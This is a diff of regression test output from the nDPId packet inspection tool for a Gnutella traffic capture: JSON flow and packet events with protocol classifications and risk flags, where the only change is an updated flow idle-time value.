+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} +01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90809,"flow_last_seen":90809,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90809,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":90809,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90809,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4BlIAAIAREmwKAAIPaO6s+nAJW\/wAJA6KHB0xAtgN+vD\/0M\/t\/ONIAwABAAUAAADDglFLQA=="} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":90840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":90840,"pkt":"CAAn5uVZUlQAEjUCCABFAACBA44AAEARVOdo7qz6CgACD1v8cAkAbdSrHB0xAtgN+vD\/0M\/t\/ONIAwEBAE4AAAD8W2jurPoAAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEGAkRVQl9jATZQIAEZ8HQAiAgAAAAAAAEAAQNESFRDAAABglFLRIDlHEU="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":90843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90843,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA5MAAEAGzLImjnfqCgACD8JExHcAt5gBIyGRwmAS\/\/8ZNwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":90843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90843,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA5MAAEAGzLImjnfqCgACD8JExHcAt5gBIyGRwmAS\/\/8ZNwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90845,"flow_last_seen":90845,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90845,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":90845,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90845,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4c0wAAIARymUKAAIPvD00t3AJLkwAJK1JGu4xAkJx0f\/\/24\/JSJ6wAwABAAUAAADDglFLQA=="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":90857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90857,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A6AAAEAReda8PTS3CgACDy5McAkAYD84Gu4xAkJx0f\/\/24\/JSJ6wAwEBAEEAAABMLrw9NLcAAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEHAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtE7kD0pA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90864,"flow_last_seen":90864,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90864,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":90864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90864,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4OIoAAIAR8bMKAAIPubtKrXAJ0PEAJMQW\/3wxAm1gREr\/fw\/7dxmzAwABAAUAAADDglFLQA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90871,"flow_last_seen":90871,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90871,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":28681,"dst_port":30566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":90871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90871,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4xlIAAIARNMIKAAIPjoSlDXAJd2YAJJzV5\/IxAvsVo43\/HfOSkBgzAwABAAUAAADDglFLQA=="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} 